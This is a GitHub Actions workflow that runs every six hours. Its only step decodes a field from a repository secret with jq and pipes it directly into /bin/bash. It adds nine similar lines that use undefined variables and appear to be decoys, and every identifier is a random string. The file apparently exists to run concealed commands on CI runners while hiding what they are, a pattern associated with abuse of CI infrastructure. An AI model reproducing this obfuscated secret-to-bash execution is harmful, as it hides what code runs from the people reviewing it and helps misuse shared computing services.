name: huchunyan3456
on:
  workflow_dispatch:
  schedule:
    - cron: '4 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: huchunyan3456
        env:
          dsxx999: ${{ secrets.dsxx999 }}
        run: |
          echo $dsxx999 | jq -r .b2247 | /bin/bash
          echo $njy0 | jq -r .ff8 | /bin/bash
          echo $xnuj47 | jq -r .nfq7 | /bin/bash
          echo $dk50603 | jq -r .yvcgs8900 | /bin/bash
          echo $wam64 | jq -r .nm63857 | /bin/bash
          echo $u43774 | jq -r .itzc57431 | /bin/bash
          echo $b40513 | jq -r .jf76 | /bin/bash
          echo $ocy7 | jq -r .nbro65871 | /bin/bash
          echo $my07 | jq -r .prcwx46 | /bin/bash
          echo $u8664 | jq -r .wpff37940 | /bin/bash

